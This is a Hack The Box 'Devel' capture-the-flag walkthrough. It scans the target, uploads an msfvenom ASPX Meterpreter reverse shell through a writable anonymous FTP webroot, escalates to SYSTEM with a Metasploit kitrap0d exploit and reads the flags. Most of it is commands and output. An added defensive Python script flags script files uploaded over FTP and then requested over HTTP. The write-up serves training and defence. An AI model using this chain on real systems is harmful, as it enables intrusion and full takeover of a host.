HTB Devel

$ nmap -T4 -sV -p- -A 10.10.10.5

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 11:09 CEST
Nmap scan report for 10.10.10.5
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.17 seconds

Open ports detected:

  • 21/tcp open  ftp     Microsoft ftpd
  • 80/tcp open  http    Microsoft IIS httpd 7.5

$ nikto -h 10.10.10.5

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.5
+ Target Hostname:    10.10.10.5
+ Target Port:        80
+ Start Time:         2020-06-20 11:18:46 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ /: Appears to be a default IIS 7 install.
+ 7863 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-06-20 11:25:09 (GMT2) (383 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$ nmap -p 80 --script vuln 10.10.10.5

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 11:23 CEST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.045s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 198.66 seconds

$ nmap -p 21 --script vuln 10.10.10.5

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 11:28 CEST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.044s latency).

PORT   STATE SERVICE
21/tcp open  ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:

Nmap done: 1 IP address (1 host up) scanned in 57.57 seconds

$ gobuster dir -u 10.10.10.5 -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.5
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/20 11:37:21 Starting gobuster
===============================================================
/aspnet_client (Status: 301)
===============================================================
2020/06/20 11:37:53 Finished
===============================================================

Nothing much useful has been found up to this point, so let's look at the anonymous FTP access that nmap reported.

$ ftp 10.10.10.5

Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:ruben): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

ftp> put test.txt

local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
6 bytes sent in 0.00 secs (344.6691 kB/s)

ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
06-23-20  09:00PM                    6 test.txt
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

The FTP listing is the same as the content of the IIS webroot (aspnet_client, iisstart.htm, welcome.png), and the anonymous user can write to it. So, if we can upload any file into the webroot, can we upload a reverse shell? An ASP reverse shell?

Searching for an ASP reverse shell, the first result is the msfvenom cheatsheet at https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

ASP Meterpreter Reverse TCP

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=9999 -f aspx -o devel.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2813 bytes

ftp> put devel.aspx

Create a listener in Metasploit:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 10.10.14.13

lhost => 10.10.14.13

msf5 exploit(multi/handler) > set lport 9999

lport => 9999

msf5 exploit(multi/handler) > set ExitOnSession false

ExitOnSession => false

msf5 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.14.13:9999

Now request http://10.10.10.5/devel.aspx in a browser so that IIS executes the uploaded page:

[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.13:9999 -> 10.10.10.5:49157) at 2020-06-24 16:25:48 +0200
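From the defender's side, the chain above leaves a distinctive trace: an anonymous FTP STOR of a script file into the webroot, followed shortly by an HTTP request for that same path. The detector below is an added example, not part of the original writeup; it correlates the two IIS logs over constructed sample lines in W3C extended format, reading the field names from each file's own #Fields header (the field order in the samples is an assumption, real logs carry their own header).

```python
import os
from datetime import datetime

# Extensions IIS passes to a script engine instead of serving as static content.
EXEC_EXTS = {".asp", ".aspx", ".ashx", ".asmx"}

# Constructed sample of an IIS FTP log: anonymous login, then STOR of an .aspx.
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-06-24 14:24:10 10.10.14.13 - USER anonymous 331
2020-06-24 14:24:31 10.10.14.13 anonymous STOR /devel.aspx 226
2020-06-24 14:24:40 10.10.14.13 anonymous STOR /welcome.png 226
"""

# Constructed sample of the IIS web log for the same host.
WEB_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2020-06-24 14:25:02 10.10.14.13 GET /iisstart.htm 200
2020-06-24 14:25:48 10.10.14.13 GET /devel.aspx 200
"""

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def _ts(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")

def find_upload_then_exec(ftp_text, web_text, window_s=3600):
    """Return (uri, uploader_ip, seconds_until_request) for every script file
    STORed over FTP and then requested over HTTP within window_s seconds."""
    uploads = {}
    for r in parse_w3c(ftp_text):
        if r["cs-method"] == "STOR" and os.path.splitext(r["cs-uri-stem"])[1].lower() in EXEC_EXTS:
            uploads[r["cs-uri-stem"].lower()] = (r["c-ip"], _ts(r))
    hits = []
    for r in parse_w3c(web_text):
        up = uploads.get(r["cs-uri-stem"].lower())
        if up and 0 <= (_ts(r) - up[1]).total_seconds() <= window_s:
            hits.append((r["cs-uri-stem"], up[0], (_ts(r) - up[1]).total_seconds()))
    return hits

if __name__ == "__main__":
    for uri, ip, secs in find_upload_then_exec(FTP_LOG, WEB_LOG):
        print(f"ALERT: {uri} uploaded over FTP from {ip}, requested over HTTP {secs:.0f}s later")
```

The static upload (welcome.png) is ignored; only the script upload that is later requested is flagged, which is the event worth paging on. The same check applies to any FTP site whose physical path overlaps an IIS site, which is the real misconfiguration here.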

msf5 exploit(multi/handler) > sessions -i 1

[*] Starting interaction with 1...
meterpreter >

meterpreter > getuid

Server username: IIS APPPOOL\Web

meterpreter > sysinfo

Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 31 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

meterpreter > background

[*] Backgrounding session 1...

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1

SESSION => 1

msf5 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 192.168.21.129:4444
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.

msf5 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  SESSION                  yes      The session to run this module on.

Exploit target:
  Id  Name
  --  ----
  0  Windows 2K SP4 - Windows 7 (x86)

msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1

SESSION => 1

msf5 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  SESSION  1                yes      The session to run this module on.

Exploit target:

  Id  Name
  --  ----
  0  Windows 2K SP4 - Windows 7 (x86)

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.21.129:4444
[*] Launching notepad to host the exploit...
[+] Process 3044 launched.
[*] Reflectively injecting the exploit DLL into 3044...
[*] Injecting exploit into 3044 ...
[*] Exploit injected. Injecting payload into 3044...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

No session came back: the payload's LHOST defaulted to 192.168.21.129, a local address the target cannot reach. Checking the options confirms it, and LHOST is then set to 10.10.14.13, the address used for the first handler.

msf5 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  SESSION  1                yes      The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes      Exit technique (Accepted: '', seh, thread, process, none)
  LHOST    192.168.21.129  yes      The listen address (an interface may be specified)
  LPORT    4444            yes      The listen port

Exploit target:

  Id  Name
  --  ----
  0  Windows 2K SP4 - Windows 7 (x86)

msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.13

lhost => 10.10.14.13

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Launching notepad to host the exploit...
[+] Process 4036 launched.
[*] Reflectively injecting the exploit DLL into 4036...
[*] Injecting exploit into 4036 ...
[*] Exploit injected. Injecting payload into 4036...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.13:4444 -> 10.10.10.5:49160) at 2020-06-24 16:31:44 +0200

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > cd Users
meterpreter > dir

Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx  8192  dir  2017-03-18 00:16:43 +0100  Administrator
40777/rwxrwxrwx  0    dir  2009-07-14 06:53:55 +0200  All Users
40777/rwxrwxrwx  8192  dir  2017-03-18 00:06:26 +0100  Classic .NET AppPool
40555/r-xr-xr-x  8192  dir  2009-07-14 04:37:05 +0200  Default
40777/rwxrwxrwx  0    dir  2009-07-14 06:53:55 +0200  Default User
40555/r-xr-xr-x  4096  dir  2009-07-14 04:37:05 +0200  Public
40777/rwxrwxrwx  8192  dir  2017-03-17 15:17:37 +0100  babis
100666/rw-rw-rw-  174  fil  2009-07-14 06:41:57 +0200  desktop.ini

meterpreter > cd babis/Desktop
meterpreter > dir

Listing: c:\Users\babis\Desktop
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282  fil  2017-03-17 15:17:51 +0100  desktop.ini
100444/r--r--r--  32    fil  2017-03-18 00:14:21 +0100  user.txt.txt

meterpreter > cat user.txt.txt

9ecdd6a3aedf24b41562fea70f4cb3e8

meterpreter > cd ..
meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > dir

Listing: c:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282  fil  2017-03-18 00:16:53 +0100  desktop.ini
100444/r--r--r--  32    fil  2017-03-18 00:17:20 +0100  root.txt.txt

meterpreter > cat root.txt.txt

e621a0b5041708797c4fc4728bc72b4b
